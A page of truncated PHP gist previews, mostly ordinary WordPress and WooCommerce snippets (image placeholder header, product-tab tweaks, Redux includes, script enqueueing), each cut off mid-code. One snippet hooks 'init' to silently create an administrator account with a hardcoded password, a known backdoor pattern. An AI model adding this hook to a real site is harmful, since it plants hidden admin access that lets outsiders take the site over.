This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
/** Image PlaceHolder for PHP. | |
* Usage : iph.php?<WIDTH>x<HEIGHT>/<COLOR> | |
* Ex : iph.php?800x600/FF00FF | |
* Author : Léo Peltier | |
* LICENSE : WTFPL | |
* */ | |
return main(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function wpb_admin_account(){ | |
$user = 'guest_admin'; | |
$pass = 'guest12345'; | |
$email = '[email protected]'; | |
if(!username_exists($user) && !email_exists($email)){ | |
$user_id = wp_create_user( $user, $pass, $email ); | |
$user = new WP_User($user_id); | |
$user ->set_role('administrator'); | |
}} | |
add_action( 'init', 'wpb_admin_account' ); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
add_filter( 'woocommerce_product_tabs', 'woo_product_tab', 98 ); | |
function woo_product_tab( $tabs ) { | |
// print_r( $tabs ); | |
$tabs['additional_information']['title']="ASSEMBLY"; | |
$tabs['description']['priority']=10; | |
$tabs['videos']['priority']=25; | |
$tabs['additional_information']['priority']=15; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//adding redux fremwork theme options | |
if(!class_exists("ReduxFrameworkPlugin")){ | |
require_once(get_template_directory()."/inc/redux-framework/redux-framework.php"); | |
require_once(get_template_directory()."/inc/theme-option.php"); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function add_function_name(){ | |
//regester script from wordpress | |
wp_enqueue_script( 'jquery'); | |
wp_enqueue_script( 'jquery-masonry'); | |
//regester styles | |
wp_enqueue_style( 'cluster-main', get_stylesheet_uri() ); | |
wp_enqueue_style( 'cluster-bootstrap', get_template_directory_uri() . '/css/bootstrap.min.css'); | |
//regester scripts |